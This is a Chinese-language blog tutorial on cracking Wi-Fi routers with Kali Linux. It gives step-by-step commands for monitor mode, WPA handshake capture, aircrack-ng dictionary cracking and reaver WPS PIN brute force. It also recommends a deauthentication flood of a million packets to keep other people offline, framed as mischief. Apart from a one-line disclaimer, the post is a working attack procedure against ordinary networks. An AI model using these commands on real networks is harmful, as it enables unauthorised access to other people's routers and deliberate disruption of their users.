• Kali 爆破和非爆破无线路由账号和密码+让别人无线掉线


    这篇日志基于别人一篇BT5的破解,Kali同样适用.附加Pin码破解

    1.ifconfig看看自己的无线网卡的名称,一般是wlan0或者eth0,后文中根据实际情况执行命令。

    2.airodump-ng wlan0 扫描当前所有路由器

    3.开启无线监控

    airmon-ng start wlan0 6

    注:wlan0为你的无线设备名称  6为你要开启的信道(但是这里的6其实并没有那么重要的说)

    这一步你可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX    XXX为给出的进程号,然后重新执行上句直到不报错

    4.因为我们已经选择好了目标,我们就直奔目标AP,开始用BT5对其进行监控

    airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0

    这时候你应该可以看到如下图示:

    1

    5.根据上图,我们可以找到四个Client客户端的MAC地址,从里面随便选个(最好选择活跃点儿的)。打开一个新的终端,上一个终端不要关闭,后面还需要用到。在新终端中输入:
    aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0

    在这里插一句话,如果你破解不了当前路由器或者看这个ssid很不爽,这里将上述设置的10改成很大的数字,别人无限掉线~ 嘿嘿是不是很坏呢。

    eg:aireplay-ng -0 1000000 -a AP’s MAC -c CP’s MAC mon0

     

    执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么恭喜,你离成功已经不远了。如果没有出现就继续重复5的命令就ok了,直到出现握手。

    6.对BT5握手抓到的包进行破解工作

    aircrack-ng -w password.txt -b AP’s MAC nenew.cap

    其中的password.txt为我们需要预置的字典文件,字典文件网上很多,搜搜就有了。奶牛也会放出自己的一些字典文件提供下载,继续关注咯。

    这里推荐一个字典生成工具,木头超级字典生成工具。

    最后上成果图

    本文只做技术讨论,不要用于非法用途,否则后果自负。

    Way2 

    基于前面拿到的路由器Mac地址

    1.airodump-ng wlan0 扫描当前所有路由器

    2.wash -i wlan0 -c 显示当前路由器

    3.wash -i wlan0 -c 11 -C -s 11信道11,查看WPS是否关闭 (No)即可以,只有开启的才使用

    4.reaver -i wlan0 -b (上面的地址)T'sMac --fail-wait=360  (出现选项输n)

    Eg:reaver -i wlan0 -b 00:11:22:33:44:55:66 --fail-wait=360

    剩下的就是默默的等待,pin码对了既可以破解.感觉没有暴力字典好啊~

  • 相关阅读:
    Kubernetes
    桥接模式
    原型模式
    工厂模式
    生成器模式
    Java-Sentinel限流中间件
    python模拟发送、消费kafka消息
    使用idea搭建springBoot项目
    linux 虚拟机不能启动不了系统,虚拟机更改linux初始启动5,出现无法启动现象
    vwware workstation虚机网络配置NAT
  • 原文地址:https://www.cnblogs.com/i0ject/p/3656526.html
Copyright © 2020-2023  润新知